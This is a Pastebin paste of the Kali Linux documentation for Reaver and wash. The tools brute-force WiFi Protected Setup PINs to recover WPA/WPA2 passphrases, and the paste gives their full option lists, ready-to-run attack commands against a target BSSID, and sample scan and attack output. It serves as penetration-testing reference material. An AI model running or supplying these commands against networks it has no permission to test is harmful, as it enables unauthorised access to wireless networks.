API tools faq
paste
TVT618

[Linux] Reaver - Attack bruteforce Wifi Protected Setup (WPS

TVT618
Mar 22nd, 2018
97
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.76 KB | None | 0 0
raw download clone embed print report
  1. [Linux]
  2. Reaver - Attack bruteforce Wifi Protected Setup (WPS)
  3.  
  4. Reaver Package Description
  5. Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
  6.  
  7. Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
  8.  
  9. On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase
  10.  
  11. Source: https://code.google.com/p/reaver-wps/
  12. Kali Reaver Repo: http://git.kali.org/gitweb/?p=packages/reaver.git;a=summary
  13. Author: Tactical Network Solutions, Craig Heffner, https://www.tacnetsol.com/
  14. License: GPLv2
  15.  
  16. Tools included in the reaver package
  17. reaver – WiFi Protected Setup Attack Tool
  18. root@GithackTools618:~# reaver -h
  19.  
  20. Reaver v1.6.4 WiFi Protected Setup Attack Tool
  21. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  22.  
  23. Required Arguments:
  24. -i, --interface=<wlan> Name of the monitor-mode interface to use
  25. -b, --bssid=<mac> BSSID of the target AP
  26.  
  27. Optional Arguments:
  28. -m, --mac=<mac> MAC of the host system
  29. -e, --essid=<ssid> ESSID of the target AP
  30. -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
  31. -o, --out-file=<file> Send output to a log file [stdout]
  32. -s, --session=<file> Restore a previous session file
  33. -C, --exec=<command> Execute the supplied command upon successful pin recovery
  34. -D, --daemonize Daemonize reaver
  35. -f, --fixed Disable channel hopping
  36. -5, --5ghz Use 5GHz 802.11 channels
  37. -v, --verbose Display non-critical warnings (-vv or -vvv for more)
  38. -q, --quiet Only display critical messages
  39. -h, --help Show help
  40.  
  41. Advanced Options:
  42. -p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
  43. -d, --delay=<seconds> Set the delay between pin attempts [1]
  44. -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
  45. -g, --max-attempts=<num> Quit after num pin attempts
  46. -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
  47. -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
  48. -t, --timeout=<seconds> Set the receive timeout period [10]
  49. -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
  50. -A, --no-associate Do not associate with the AP (association must be done by another application)
  51. -N, --no-nacks Do not send NACK messages when out of order packets are received
  52. -S, --dh-small Use small DH keys to improve crack speed
  53. -L, --ignore-locks Ignore locked state reported by the target AP
  54. -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
  55. -J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)
  56. -w, --win7 Mimic a Windows 7 registrar [False]
  57. -K, --pixie-dust Run pixiedust attack
  58. -Z Run pixiedust attack
  59.  
  60. Example:
  61. reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
  62.  
  63. wash – WiFi Protected Setup Scan Tool
  64. root@GithackTools618:~# wash -h
  65.  
  66. Wash v1.6.4 WiFi Protected Setup Scan Tool
  67. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
  68.  
  69. Required Arguments:
  70. -i, --interface=<iface> Interface to capture packets on
  71. -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
  72.  
  73. Optional Arguments:
  74. -c, --channel=<num> Channel to listen on [auto]
  75. -o, --out-file=<file> Write data to file
  76. -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
  77. -D, --daemonize Daemonize wash
  78. -5, --5ghz Use 5GHz 802.11 channels
  79. -s, --scan Use scan mode
  80. -u, --survey Use survey mode [default]
  81. -a, --all Show all APs, even those without WPS
  82. -j, --json print extended WPS info as json
  83. -h, --help Show help
  84.  
  85. Example:
  86. wash -i wlan0mon
  87.  
  88. wash Usage Example
  89. Scan for networks using the monitor mode interface (-i mon0) on channel 6 (-c 6), while ignoring frame checksum errors (-C):
  90. root@kali:~# wash -i mon0 -c 6 -C
  91.  
  92. Wash v1.4 WiFi Protected Setup Scan Tool
  93. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  94.  
  95. BSSID Channel RSSI WPS Version WPS Locked ESSID
  96. ---------------------------------------------------------------------------------------------------------------
  97. E0:3F:49:6A:57:78 6 -73 1.0 No ASUS
  98.  
  99. reaver Usage Example
  100. Use the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v):
  101. root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v
  102.  
  103. Reaver v1.4 WiFi Protected Setup Attack Tool
  104. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  105.  
  106. [+] Waiting for beacon from E0:3F:49:6A:57:78
  107. [+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
  108. [+] Trying pin 12345670
  109.  
  110. Download reaver: https://code.google.com/p/reaver-wps/
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!